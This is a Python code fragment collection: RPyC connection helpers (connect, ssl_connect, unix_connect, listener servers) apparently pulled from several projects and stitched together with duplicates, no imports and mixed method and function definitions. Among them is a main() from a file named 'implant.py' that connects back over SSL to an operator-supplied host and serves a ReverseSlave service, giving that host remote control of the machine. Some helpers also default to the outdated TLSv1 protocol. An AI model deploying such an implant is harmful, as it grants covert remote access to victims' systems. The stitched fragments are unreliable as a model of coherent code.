def connect(self, host, port=8002):
"""
Setup connection to the node via a secure socket.
:param host: the node ip.
:param port: the port behind which c-simple server runs, default is 8002.
"""
# To avoid trying to connect without anything set up.
if not (os.path.isfile(self.client_cert) and os.path.isfile(self.client_key)):
self.gen_certificate(key_length=4096)
if not os.path.isfile(self.node_cert):
raise Exception('Server certificate is missing. Cannot initiate the connection')
try:
# Connecting the socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setblocking(1)
s.connect((host, port))
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(self.node_cert)
context.load_cert_chain(self.client_cert, self.client_key)
secure_sock = context.wrap_socket(s, server_side=False, server_hostname=host)
self.conn = factory.connect_stream(SocketStream(secure_sock), service=VoidService)
except ssl.SSLError as e:
raise Exception('Could not connect to host {}:{}, getting following ssl error :\n{}'.format(host, port, e))
def connect(self, service=VoidService, config={}):
"""Same as :func:`~rpyc.utils.factory.connect`, but with the ``host`` and ``port``
parameters fixed"""
return rpyc.utils.factory.connect_stream(SocketStream(
self._connect_sock()),
service=service,
config=config)
def _server(listener, remote_service, remote_config, args=None):
try:
with closing(listener):
client = listener.accept()[0]
conn = connect_stream(SocketStream(client),
service=remote_service,
config=remote_config)
if isinstance(args, dict):
_oldstyle = (MasterService, SlaveService)
is_newstyle = isinstance(remote_service, type) and not issubclass(
remote_service, _oldstyle)
is_newstyle |= not isinstance(remote_service,
type) and not isinstance(
remote_service, _oldstyle)
is_voidservice = isinstance(remote_service, type) and issubclass(
remote_service, VoidService)
is_voidservice |= not isinstance(remote_service,
type) and isinstance(
remote_service, VoidService)
if is_newstyle and not is_voidservice:
conn._local_root.exposed_namespace.update(args)
elif not is_voidservice:
conn._local_root.namespace.update(args)
conn.serve_all()
except KeyboardInterrupt:
interrupt_main()
def ssl_connect(host,
port,
keyfile=None,
certfile=None,
ca_certs=None,
cert_reqs=None,
ssl_version=None,
ciphers=None,
service=VoidService,
config={},
ipv6=False,
keepalive=False):
"""
creates an SSL-wrapped connection to the given host (encrypted and
authenticated).
:param host: the hostname to connect to
:param port: the TCP port to use
:param service: the local service to expose (defaults to Void)
:param config: configuration dict
:param ipv6: whether to create an IPv6 socket or an IPv4 one(defaults to ``False``)
:param keepalive: whether to set TCP keepalive on the socket (defaults to ``False``)
The following arguments are passed directly to
`ssl.wrap_socket <http://docs.python.org/dev/library/ssl.html#ssl.wrap_socket>`_:
:param keyfile: see ``ssl.wrap_socket``. May be ``None``
:param certfile: see ``ssl.wrap_socket``. May be ``None``
:param ca_certs: see ``ssl.wrap_socket``. May be ``None``
:param cert_reqs: see ``ssl.wrap_socket``. By default, if ``ca_cert`` is specified,
the requirement is set to ``CERT_REQUIRED``; otherwise it is
set to ``CERT_NONE``
:param ssl_version: see ``ssl.wrap_socket``. The default is ``PROTOCOL_TLSv1``
:param ciphers: see ``ssl.wrap_socket``. May be ``None``. New in Python 2.7/3.2
:returns: an RPyC connection
"""
ssl_kwargs = {"server_side": False}
if keyfile is not None:
ssl_kwargs["keyfile"] = keyfile
if certfile is not None:
ssl_kwargs["certfile"] = certfile
if ca_certs is not None:
ssl_kwargs["ca_certs"] = ca_certs
ssl_kwargs["cert_reqs"] = ssl.CERT_REQUIRED
if cert_reqs is not None:
ssl_kwargs["cert_reqs"] = cert_reqs
if ssl_version is None:
ssl_kwargs["ssl_version"] = ssl.PROTOCOL_TLSv1
else:
ssl_kwargs["ssl_version"] = ssl_version
if ciphers is not None:
ssl_kwargs["ciphers"] = ciphers
s = SocketStream.ssl_connect(host,
port,
ssl_kwargs,
ipv6=ipv6,
keepalive=keepalive)
return connect_stream(s, service, config)
def connect(self, service=VoidService, config=None):
"""Same as :func:`connect <rpyc.utils.factory.connect>`, but with the ``host`` and ``port``
parameters fixed"""
config = config or {}
stream = SocketStream(
self.remote_machine.connect_sock(self.remote_port))
return rpyc.connect_stream(stream, service=service, config=config)
def server(listener=listener):
with closing(listener):
client = listener.accept()[0]
conn = connect_stream(SocketStream(client), service=remote_service,
config=remote_config)
try:
conn.serve_all()
except KeyboardInterrupt:
interrupt_main()
def classic_connect(self):
"""Same as :func:`classic.connect <rpyc.utils.classic.connect>`, but with the ``host`` and
``port`` parameters fixed"""
if self.local_port is None:
# ParamikoMachine
stream = SocketStream(self.remote_machine.connect_sock(self.remote_port))
return rpyc.classic.connect_stream(stream)
else:
return rpyc.classic.connect("localhost", self.local_port)
def connect(self, service = VoidService, config = {}):
"""Same as :func:`connect <rpyc.utils.factory.connect>`, but with the ``host`` and ``port``
parameters fixed"""
if self.local_port is None:
# ParamikoMachine
stream = SocketStream(self.remote_machine.connect_sock(self.remote_port))
return rpyc.connect_stream(stream, service = service, config = config)
else:
return rpyc.connect("localhost", self.local_port, service = service, config = config)
def server(listener=listener, args=args):
with closing(listener):
client = listener.accept()[0]
conn = connect_stream(SocketStream(client), service=remote_service, config=remote_config)
try:
for k in args:
conn._local_root.exposed_namespace[k] = args[k]
conn.serve_all()
except KeyboardInterrupt:
interrupt_main()
def unix_connect(path, service=VoidService, config={}):
"""
creates a socket-connection to the given unix domain socket
:param path: the path to the unix domain socket
:param service: the local service to expose (defaults to Void)
:param config: configuration dict
:returns: an RPyC connection
"""
s = SocketStream.unix_connect(path)
return connect_stream(s, service, config)
def connect(host,
port,
service=VoidService,
config={},
ipv6=False,
keepalive=False,
timeout=3):
s = SocketStream.connect(host,
port,
ipv6=ipv6,
keepalive=keepalive,
timeout=timeout)
return connect_stream(s, service, config)
def connect(host, port, service=VoidService, config={}, ipv6=False, keepalive=False):
"""
creates a socket-connection to the given host and port
:param host: the hostname to connect to
:param port: the TCP port to use
:param service: the local service to expose (defaults to Void)
:param config: configuration dict
:param ipv6: whether to use IPv6 or not
:returns: an RPyC connection
"""
s = SocketStream.connect(host, port, ipv6=ipv6, keepalive=keepalive)
return connect_stream(s, service, config)
def connect(host, port, service=VoidService, config={}, ipv6=False, keepalive=False):
"""
creates a socket-connection to the given host and port
:param host: the hostname to connect to
:param port: the TCP port to use
:param service: the local service to expose (defaults to Void)
:param config: configuration dict
:param ipv6: whether to create an IPv6 socket (defaults to ``False``)
:param keepalive: whether to set TCP keepalive on the socket (defaults to ``False``)
:returns: an RPyC connection
"""
s = SocketStream.connect(host, port, ipv6=ipv6, keepalive=keepalive)
return connect_stream(s, service, config)
def main():
if len(sys.argv) == 2:
host, port = sys.argv[1].split(":")
try:
s = SSLClient().connect(host, int(port))
conn = connect_stream(SocketStream(s), ReverseSlave, {})
while True:
conn.serve_all()
except KeyboardInterrupt:
pass
except Exception as e:
print e
else:
print "usage: python implant.py 127.0.0.1:8080"
def ssl_connect(host, port, keyfile=None, certfile=None, ca_certs=None,
cert_reqs=None, ssl_version=None, ciphers=None,
service=VoidService, config={}, ipv6=False, keepalive=False):
"""
creates an SSL-wrapped connection to the given host (encrypted and
authenticated).
:param host: the hostname to connect to
:param port: the TCP port to use
:param service: the local service to expose (defaults to Void)
:param config: configuration dict
:param ipv6: whether to create an IPv6 socket or an IPv4 one(defaults to ``False``)
:param keepalive: whether to set TCP keepalive on the socket (defaults to ``False``)
The following arguments are passed directly to
`ssl.wrap_socket <http://docs.python.org/dev/library/ssl.html#ssl.wrap_socket>`_:
:param keyfile: see ``ssl.wrap_socket``. May be ``None``
:param certfile: see ``ssl.wrap_socket``. May be ``None``
:param ca_certs: see ``ssl.wrap_socket``. May be ``None``
:param cert_reqs: see ``ssl.wrap_socket``. By default, if ``ca_cert`` is specified,
the requirement is set to ``CERT_REQUIRED``; otherwise it is
set to ``CERT_NONE``
:param ssl_version: see ``ssl.wrap_socket``. The default is ``PROTOCOL_TLSv1``
:param ciphers: see ``ssl.wrap_socket``. May be ``None``. New in Python 2.7/3.2
:returns: an RPyC connection
"""
ssl_kwargs = {"server_side" : False}
if keyfile is not None:
ssl_kwargs["keyfile"] = keyfile
if certfile is not None:
ssl_kwargs["certfile"] = certfile
if ca_certs is not None:
ssl_kwargs["ca_certs"] = ca_certs
ssl_kwargs["cert_reqs"] = ssl.CERT_REQUIRED
if cert_reqs is not None:
ssl_kwargs["cert_reqs"] = cert_reqs
if ssl_version is None:
ssl_kwargs["ssl_version"] = ssl.PROTOCOL_TLSv1
else:
ssl_kwargs["ssl_version"] = ssl_version
if ciphers is not None:
ssl_kwargs["ciphers"] = ciphers
s = SocketStream.ssl_connect(host, port, ssl_kwargs, ipv6=ipv6, keepalive=keepalive)
return connect_stream(s, service, config)
def unix_connect(socket_path, retry=10) -> rpyc.Connection:
"""
Connects to bridge using unix socket.
"""
for i in range(retry):
try:
logger.debug(f"Connecting to socket path: {socket_path}, try {i + 1}")
stream = SocketStream.unix_connect(socket_path)
link = rpyc.classic.connect_stream(stream)
link.ping()
logger.debug(f"Connected to {socket_path}")
return link
except socket.error:
time.sleep(1)
continue
raise DragodisError(f"Could not connect to {socket_path} after {retry} tries.")
def _connect_sock(self):
if self.local_port is None:
# ParamikoMachine
return self.remote_machine.connect_sock(self.remote_port)
else:
return SocketStream._connect("localhost", self.local_port)
def classic_connect(self):
"""Same as :func:`classic.connect <rpyc.utils.classic.connect>`, but with the ``host`` and
``port`` parameters fixed"""
return rpyc.utils.classic.connect_stream(
SocketStream(self._connect_sock()))
def _connect_sock(self):
if self.local_port is None:
# ParamikoMachine
return self.remote_machine.connect_sock(self.remote_port)
else:
return SocketStream._connect("localhost", self.local_port)
def read(self, count):
buf = SocketStream.read(self, count)
logger.debug("Read: {}{}".format(buf, self.get_ending(buf)))
return buf
def write(self, data):
logger.debug("Write: {}{}".format(data, self.get_ending(data)))
SocketStream.write(self, data)
def read(self, count):
buf = SocketStream.read(self, count)
logger.debug("Read: {}{}".format(buf, self.get_ending(buf)))
return buf
def write(self, data):
logger.debug("Write: {}{}".format(data, self.get_ending(data)))
SocketStream.write(self, data)
